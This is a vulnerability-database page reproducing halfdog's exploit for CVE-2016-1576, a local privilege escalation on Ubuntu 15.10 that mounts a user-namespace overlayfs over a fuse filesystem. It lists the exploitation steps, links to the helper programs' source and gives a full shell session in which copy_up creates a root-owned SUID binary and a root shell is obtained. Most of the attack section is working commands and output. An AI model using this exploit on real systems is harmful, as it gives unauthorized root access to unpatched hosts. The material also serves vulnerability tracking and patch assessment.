Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Ubuntu 15.10 - USERNS Overlayfs Over Fuse Privilege Escalation Vulnerability

🗓️ 29 Mar 2017 00:00:00Reported by halfdogType 
zdt
 zdt🔗 0day.today👁 57 Views

Ubuntu 15.10 USERNS overlayfs privilege escalatio

Related
Code
ReporterTitlePublishedViews
Family
Cloud Foundry		USN-2910-1 Linux kernel vulnerability | Cloud Foundry
26 Feb 201600:00
cloudfoundry
CNVD		Ubuntu Linux Local Elevation of Privilege Vulnerability
26 Feb 201600:00
cnvd
CVE		CVE-2016-1576
2 May 201610:00
cve
Cvelist		CVE-2016-1576
2 May 201610:00
cvelist
Debian CVE		CVE-2016-1576
2 May 201610:00
debiancve
Oracle linux		Unbreakable Enterprise kernel security update
23 Aug 201700:00
oraclelinux
Tenable Nessus		EulerOS Virtualization 3.0.1.0 : kernel (EulerOS-SA-2019-1491)
13 May 201900:00
nessus
Tenable Nessus		EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1528)
14 May 201900:00
nessus
Tenable Nessus		Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2017-3609)
25 Aug 201700:00
nessus
Tenable Nessus		OracleVM 3.4 : Unbreakable / etc (OVMSA-2017-0145) (Stack Clash)
25 Aug 201700:00
nessus
Rows per page
Source: http://www.halfdog.net/Security/2016/OverlayfsOverFusePrivilegeEscalation/
 
## Introduction
 
Problem description: On Ubuntu Wily it is possible to place an USERNS overlayfs mount over a fuse mount. The fuse filesystem may contain SUID binaries, but those cannot be used to gain privileges due to nosuid mount options. But when touching such an SUID binary via overlayfs mount, this will trigger copy_up including all file attributes, thus creating a real SUID binary on the disk.
 
## Methods
 
Basic exploitation sequence is:
 
Mount fuse filesystem exposing one world writable SUID binary
Create USERNS
Mount overlayfs on top of fuse
Open the SUID binary RDWR in overlayfs, thus triggering copy_up
This can be archived, e.g.
 
SuidExec (http://www.halfdog.net/Misc/Utils/SuidExec.c)
FuseMinimal (http://www.halfdog.net/Security/2016/OverlayfsOverFusePrivilegeEscalation/FuseMinimal.c)
UserNamespaceExec (http://www.halfdog.net/Misc/Utils/UserNamespaceExec.c)
 
test# mkdir fuse
test# mv SuidExec RealFile
test# ./FuseMinimal fuse
test# ./UserNamespaceExec -- /bin/bash
root# mkdir mnt upper work
root# mount -t overlayfs -o lowerdir=fuse,upperdir=upper,workdir=work overlayfs mnt
root# touch mnt/file
touch: setting times of ‘mnt/file’: Permission denied
root# umount mnt
root# exit
test# fusermount -u fuse
test# ls -al upper/file
-rwsr-xr-x 1 root root 9088 Jan 22 09:18 upper/file
test# upper/file /bin/bash
root# id
uid=0(root) gid=100(users) groups=100(users)

#  0day.today [2018-03-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Mar 2017 00:00Current
7.6High risk
Vulners AI Score7.6
EPSS0.00352
ubuntu 15.10userns overlayfsprivilege escalationfuse filesystemsuid binaryexploitationsuidexecfuseminimalusernamespaceexec
57